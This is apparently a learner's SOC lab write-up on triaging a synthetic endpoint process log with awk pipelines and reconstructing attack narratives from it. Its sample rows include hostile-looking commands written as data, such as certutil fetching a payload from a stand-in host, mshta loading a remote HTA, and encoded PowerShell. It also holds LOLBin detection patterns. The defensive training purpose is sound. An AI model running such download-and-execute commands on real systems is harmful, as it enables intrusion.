🧪 Lab Objective

Practice SOC-style endpoint triage on a synthetic process-creation dataset, using Linux pipelines to answer:

  • Which parent → child process chains are suspicious?
  • Which users / hosts are involved?
  • Which commands were actually run?
  • How do I pivot from one suspicious event into a larger attack story?

🧰 Lab Setup

Dataset

I created a fake Windows-style endpoint process log (proc_events.log) with pipe-delimited fields:

  1. timestamp
  2. host
  3. user
  4. parent process
  5. child process
  6. command line

The dataset intentionally includes:

  • normal-ish admin/dev activity
  • suspicious Office/browser → shell / LOLBin chains
  • persistence indicators (reg.exe, schtasks.exe)
  • web-server process spawning shells (w3wp.exe -> cmd.exe -> powershell.exe)

This makes it useful for learning triage patterns without real-world noise.


❓ Questions I Practiced Answering

  • Which parent→child combinations happen most often?
  • Which events contain likely shells / script hosts / LOLBins?
  • Which hosts and users are associated with suspicious chains?
  • Which child processes are rare in this dataset?
  • Are there URLs in command lines, and what domains/URLs appear?
  • Can I reconstruct a plausible attack narrative for a host?

🛠️ What I Did (Step-by-Step)

1) Built the sample process log

I created proc_events.log using a heredoc and included multiple host/user scenarios:

  • WS-FIN-07 (Office → PowerShell → certutil → rundll32)
  • WS-SALES-12 (Outlook/Excel → cmd → PowerShell → reg/schtasks)
  • WS-MKT-05 (Edge → mshta → PowerShell)
  • SRV-WEB-01 (w3wp.exe → shell chain)
  • WS-ENG-02 (developer-ish activity: code → PowerShell → Python → curl)
  • WS-IT-01 (admin-ish activity: MMC → PowerShell → WMIC)

This was the foundation for all later pivots.
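A minimal sketch of the heredoc approach (the three rows below are invented stand-ins, not the dataset's actual contents):

```shell
# Build a small pipe-delimited process log with a heredoc.
# Fields: timestamp|host|user|parent process|child process|command line
cat > proc_events.log <<'EOF'
2025-01-15T09:12:03|WS-FIN-07|mario|winword.exe|powershell.exe|powershell.exe -nop -w hidden -enc AAAA
2025-01-15T09:13:10|WS-FIN-07|mario|powershell.exe|cmd.exe|cmd.exe /c whoami
2025-01-15T09:14:22|WS-SALES-12|andrea|outlook.exe|excel.exe|excel.exe invoice.xlsx
EOF

# Quick sanity check on row count
wc -l proc_events.log
```

The quoted 'EOF' delimiter matters: it prevents the shell from expanding anything inside the heredoc, so command lines survive verbatim.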


2) Inspected the data format before parsing

I used head to inspect the first rows and confirm the structure.

head -5 proc_events.log

Why this mattered

I initially (accidentally) used whitespace-based parsing on the process log and got broken results because the command line field contains spaces.

That was a good reminder of the rule:

Always inspect format first. Then choose the parser.


3) Switched to the correct parser: awk -F'|'

I verified field positions by printing one row with field numbers:

head -1 proc_events.log | awk -F'|' '{for(i=1;i<=NF;i++) print i, $i}'

This confirmed:

  • $4 = parent process

  • $5 = child process

  • $6 = command line

This was the key fix that made the rest of the lab work correctly.


4) Counted parent → child process combinations

I built the first real triage view:

awk -F'|' '{print $4 " -> " $5}' proc_events.log | sort | uniq -c | sort -nr

What this does

  • extracts parent+child

  • groups identical chains

  • counts frequency

  • ranks them

Why it matters

This turns raw process events into a behavior map.


5) Filtered for likely interesting children (shells / LOLBins / script hosts)

I filtered on the child process field ($5) for things like:

  • cmd.exe

  • powershell.exe

  • mshta.exe

  • rundll32.exe

  • certutil.exe

  • wmic.exe

  • reg.exe

  • schtasks.exe

This let me quickly isolate higher-value events without losing the full line context.
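A sketch of that child-process filter, assuming the six-field layout above (the sample rows are invented so the snippet runs standalone, and the LOLBin list is one reasonable choice, not exhaustive):

```shell
# Illustrative subset of the log (the real file has many more rows)
cat > proc_events.log <<'EOF'
2025-01-15T09:12:03|WS-FIN-07|mario|winword.exe|powershell.exe|powershell.exe -nop -enc AAAA
2025-01-15T09:13:10|WS-ENG-02|dev1|code.exe|python.exe|python.exe build.py
2025-01-15T09:14:22|WS-MKT-05|sara|msedge.exe|mshta.exe|mshta.exe http://example.test/a.hta
EOF

# Keep full lines whose child process ($5) is a shell, script host, or LOLBin
awk -F'|' '$5 ~ /^(cmd|powershell|mshta|rundll32|certutil|wmic|reg|schtasks)\.exe$/' proc_events.log
```

Matching on `$5` instead of grepping the whole line avoids false hits when a process name merely appears inside a command-line argument.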


6) Filtered suspicious parent + child combinations

I then focused on high-signal combos like:

  • Office / browser / script-host parents spawning:

    • shells

    • LOLBins

    • script engines

This produced the clearest “triage-worthy” subset of events.

Examples that popped out:

  • winword.exe -> powershell.exe

  • excel.exe -> cmd.exe

  • msedge.exe -> mshta.exe

  • mshta.exe -> powershell.exe
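The combo filter can be sketched as a two-field awk match (sample rows invented; the parent and child regex lists are illustrative, not a complete detection rule):

```shell
cat > proc_events.log <<'EOF'
2025-01-15T09:12:03|WS-FIN-07|mario|winword.exe|powershell.exe|powershell.exe -nop -enc AAAA
2025-01-15T09:13:10|WS-IT-01|admin1|cmd.exe|powershell.exe|powershell.exe Get-Service
2025-01-15T09:14:22|WS-MKT-05|sara|msedge.exe|mshta.exe|mshta.exe http://example.test/a.hta
EOF

# High-signal combos: suspicious parent class AND suspicious child class
awk -F'|' '$4 ~ /^(winword|excel|outlook|msedge|mshta|w3wp)\.exe$/ &&
           $5 ~ /^(cmd|powershell|mshta|rundll32|certutil|wmic|reg|schtasks)\.exe$/' proc_events.log
```

Note that the plain cmd.exe → powershell.exe row is deliberately excluded here: cmd.exe is not in the parent list, which is exactly what makes this view higher-signal than the child-only filter.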


7) Reformatted suspicious events into a triage-friendly summary line

I used awk to print events in a much more readable form:

  • HOST=...

  • USER=...

  • parent -> child

  • CMD=...

This made the output feel more like an analyst note than raw logs.
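A sketch of that summary formatting with awk's printf (sample row invented; the label layout follows the HOST= / USER= / CMD= scheme above):

```shell
cat > proc_events.log <<'EOF'
2025-01-15T09:12:03|WS-FIN-07|mario|winword.exe|powershell.exe|powershell.exe -nop -enc AAAA
EOF

# One readable analyst-style summary line per event
awk -F'|' '{printf "HOST=%s USER=%s %s -> %s CMD=%s\n", $2, $3, $4, $5, $6}' proc_events.log
```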


8) Pivoted by host to reconstruct stories

I pivoted on hosts like:

  • WS-FIN-07

  • WS-SALES-12

This was the point where the “raw events are narrative fragments” idea really clicked.

Instead of isolated lines, I could see sequences of actions.
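A host pivot can be as simple as an equality test on field 2 (sample rows invented):

```shell
cat > proc_events.log <<'EOF'
2025-01-15T09:12:03|WS-FIN-07|mario|winword.exe|powershell.exe|powershell.exe -nop -enc AAAA
2025-01-15T09:13:10|WS-SALES-12|andrea|excel.exe|cmd.exe|cmd.exe /c whoami
2025-01-15T09:14:22|WS-FIN-07|mario|powershell.exe|cmd.exe|cmd.exe /c ipconfig /all
EOF

# All events for one host; ISO-8601 timestamps sort correctly as plain text
awk -F'|' '$2 == "WS-FIN-07"' proc_events.log | sort
```

Because the timestamp is field 1 and uses ISO-8601, a plain `sort` yields the host's events in chronological order, which is what turns fragments into a sequence.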


9) Counted rare child processes

I ranked child processes by ascending frequency:

awk -F'|' '{print $5}' proc_events.log | sort | uniq -c | sort -n

This helped surface the idea that:

In security, rare can be more valuable than “top N”.

Examples of rare (count = 1 in this dataset):

  • mshta.exe

  • reg.exe

  • schtasks.exe

  • wmic.exe

  • curl.exe

  • python.exe


10) Counted suspicious activity by user and by host

I grouped suspicious parent→child matches by:

  • user

  • host

This helped answer:

  • is this concentrated on one system?

  • are multiple users involved?

  • what is the scope?
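A sketch of that grouping, reusing the same child-process regex (sample rows and the regex list are illustrative):

```shell
cat > proc_events.log <<'EOF'
2025-01-15T09:12:03|WS-FIN-07|mario|winword.exe|powershell.exe|powershell.exe -enc AAAA
2025-01-15T09:13:10|WS-SALES-12|andrea|excel.exe|cmd.exe|cmd.exe /c whoami
2025-01-15T09:14:22|WS-FIN-07|mario|powershell.exe|cmd.exe|cmd.exe /c ipconfig
EOF

SUS='^(cmd|powershell|mshta|rundll32|certutil|wmic|reg|schtasks)\.exe$'

# Suspicious children grouped by user ($3)...
awk -F'|' -v re="$SUS" '$5 ~ re {print $3}' proc_events.log | sort | uniq -c | sort -nr

# ...and by host ($2)
awk -F'|' -v re="$SUS" '$5 ~ re {print $2}' proc_events.log | sort | uniq -c | sort -nr
```

Keeping the regex in a shell variable means the "suspicious" definition stays identical across both pivots.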


11) Extracted URLs from command lines

I filtered command lines containing http:// or https://, then extracted rough URLs.

This linked endpoint process behavior to network indicators like:

  • payload download URLs

  • check-in URLs

  • internal portal URLs

  • GitHub API call (likely benign in dev context)
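A rough URL extraction can look like this (sample rows invented; the character class is deliberately approximate, stopping at spaces, pipes, and quotes rather than parsing URLs properly):

```shell
cat > proc_events.log <<'EOF'
2025-01-15T09:12:03|WS-FIN-07|mario|powershell.exe|certutil.exe|certutil.exe -urlcache -f http://example.test/payload.bin C:\Temp\p.bin
2025-01-15T09:13:10|WS-ENG-02|dev1|powershell.exe|curl.exe|curl.exe https://api.github.com/repos
EOF

# Lines that contain a URL, then a rough URL extraction, deduplicated
grep -E 'https?://' proc_events.log | grep -oE 'https?://[^ |"]+' | sort -u
```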


📊 Key Results / Findings

Parent → child frequency (top observation)

The most common chain in this dataset was:

  • cmd.exe -> powershell.exe (4 times)

This alone is not proof of compromise, but it’s a useful pattern to inspect in context.

Other notable chains:

  • powershell.exe -> certutil.exe (2 times)

  • multiple one-off high-signal chains such as:

    • winword.exe -> powershell.exe

    • msedge.exe -> mshta.exe

    • cmd.exe -> rundll32.exe

    • w3wp.exe -> cmd.exe


Rare child process counts (useful for signal)

Rare children (count = 1) included:

  • curl.exe

  • excel.exe

  • msedge.exe

  • mshta.exe

  • python.exe

  • reg.exe

  • schtasks.exe

  • wmic.exe

This reinforced an important SOC lesson:

Rare process names or chains can be higher-value signals than common admin tools.


Suspicious host distribution (from filtered parent→child combos)

The suspicious-chain grouping showed multiple affected hosts, with WS-MKT-05 appearing more than once in the filtered set.

This supports the “scope” question:

  • one host = maybe isolated

  • multiple hosts = broader campaign possibility (or multiple scenarios in a training dataset)


🕵️ Triage Narratives Reconstructed (Most Important Part)

1) WS-FIN-07 / user mario — likely malware execution chain

Observed sequence:

  • winword.exe -> powershell.exe (encoded/hidden-looking PowerShell)

  • powershell.exe -> cmd.exe (whoami, ipconfig /all) = recon

  • powershell.exe -> certutil.exe (download external payload to temp)

  • cmd.exe -> rundll32.exe (execute DLL from user temp)

  • rundll32.exe -> powershell.exe (network check-in / web request)

Why this is suspicious

This chain matches a classic pattern:
Office-triggered execution → recon → payload download → DLL execution → callback


2) WS-SALES-12 / user andrea — likely phishing + persistence

Observed sequence:

  • outlook.exe -> excel.exe (attachment workflow)

  • excel.exe -> cmd.exe

  • cmd.exe -> powershell.exe (download/execute style command)

  • powershell.exe -> reg.exe (Run key persistence in HKCU)

  • powershell.exe -> schtasks.exe (scheduled task persistence)

Why this is suspicious

This chain strongly suggests:
email/document execution → PowerShell → persistence establishment


3) WS-MKT-05 / user sara — browser → mshta → PowerShell

Observed sequence:

  • msedge.exe -> mshta.exe (remote HTA URL)

  • mshta.exe -> powershell.exe (download/execute style command)

Why this is suspicious

mshta.exe is a classic LOLBin, and it is especially suspicious in browser-driven chains that call remote URLs.


4) SRV-WEB-01 / user svc_iis — web server shell chain (high severity)

Observed sequence:

  • w3wp.exe -> cmd.exe

  • cmd.exe -> powershell.exe

  • powershell.exe -> certutil.exe

  • powershell.exe -> rundll32.exe

Why this is suspicious

A web server worker process spawning shells + LOLBins is a strong indicator of:

  • web shell behavior

  • command execution through the web app

  • exploitation of a vulnerable application

This would be high-priority triage in a real SOC.


⚠️ Mistakes I Made (and Why They Were Valuable)

1) Parsing with the wrong delimiter

I initially treated the log like space-delimited text and got bad field extraction because the command line field includes spaces.

✅ Fix:

  • switched to awk -F'|'

Takeaway: always identify the true delimiter first.


2) Pasting explanatory text into the shell

Several lines from notes/explanations were pasted directly into Bash, producing:

  • command not found

  • syntax errors

  • noise in the raw session log

✅ Fix:

  • separated “commands to run” from “explanatory text”

  • used echo only when intentionally printing notes

Takeaway: in labs, copy only the executable parts.


3) Typos while re-running commands

Examples like accidental merged commands (head -5 proc_events.lohead ...) created noisy output.

✅ Fix:

  • slowed down and re-ran correctly

  • used head + field-checking again to re-anchor

Takeaway: when output gets weird, restart from:

  • head

  • field mapping

  • one pipeline at a time


🧠 What I Learned

Technical

  • How to parse pipe-delimited endpoint process telemetry with awk -F'|'

  • How to count parent → child chains with sort | uniq -c

  • How to pivot by:

    • host

    • user

    • child process

    • command line URL presence

  • How to use rare-process counting as a signal-finding technique

SOC thinking

  • Process name is a clue, not a verdict

  • Parent → child adds major context quickly

  • Command line often reveals the actual behavior

  • Counting/grouping creates evidence

  • Raw logs become a story only after pivoting and aggregation


🔗 Key Cybersecurity Connections

This lab directly reinforced concepts useful for:

  • SOC triage

  • endpoint detection reasoning

  • process-chain hunting

  • LOLBin awareness

  • incident narrative building

It also reinforced why Linux pipelines feel like a mini-SIEM:

  • filter

  • extract

  • group/count

  • rank

  • interpret
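Those five stages map onto a single pipeline; a sketch with invented sample rows:

```shell
cat > proc_events.log <<'EOF'
2025-01-15T09:12:03|WS-FIN-07|mario|winword.exe|powershell.exe|powershell.exe -enc AAAA
2025-01-15T09:13:10|WS-FIN-07|mario|cmd.exe|powershell.exe|powershell.exe iwr http://example.test
2025-01-15T09:14:35|WS-FIN-07|mario|cmd.exe|powershell.exe|powershell.exe Get-Process
2025-01-15T09:15:02|WS-IT-01|admin1|mmc.exe|wmic.exe|wmic.exe process list
EOF

# filter (suspicious child) -> extract (parent -> child) -> group/count -> rank
awk -F'|' '$5 ~ /^(cmd|powershell|mshta|wmic)\.exe$/ {print $4 " -> " $5}' proc_events.log \
  | sort | uniq -c | sort -nr
```

The interpret stage is the human part: the ranked output is the evidence, and the analyst decides what it means.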


⏭️ Next Steps

  1. Re-run the same lab from memory (especially awk -F'|' workflows)

  2. Build a one-page cheat sheet of suspicious parent→child chains

  3. Extend the dataset with:

    • benign Office behavior

    • more admin workflows

    • browser downloads that are actually normal

  4. Practice extracting:

    • domains (not just URLs)

    • file paths in temp/user profile

    • persistence indicators

  5. Translate one or two findings into detection logic ideas (Sigma / Splunk / KQL later)


🪞 Reflection

This was one of the most useful labs so far because it connected:

  • Linux parsing skills

  • SOC pivots

  • process vocabulary

  • investigation thinking

The biggest win was not the commands themselves — it was learning how to turn process events into a timeline/story.

Also, the mistakes (bad delimiter, pasted note text into shell) were actually useful because they forced me to debug my workflow and reinforce the “inspect first, parse second” habit.


Lessons Learned

What worked

  • Using a synthetic but realistic dataset

  • Verifying field positions before building pipelines

  • Counting parent→child combos early

  • Pivoting by host to reconstruct attack narratives

  • Looking at rare child processes, not just common ones

What broke

  • Parsing assumptions (space-delimited thinking)

  • Copy/paste discipline (notes vs commands)

  • Typos that created noisy shell output

Why it broke

  • The command line field contains spaces, so default awk parsing was wrong

  • I mixed explanatory text with executable commands during practice

  • I was moving fast and chaining too much before re-checking output

Fix / takeaway

  • Start every new log with: head + delimiter check + field mapping

  • Use awk -F'|' for this dataset consistently

  • Keep notes separate from commands (or prefix notes safely with echo)

  • If output looks wrong, reset and rebuild one pipeline at a time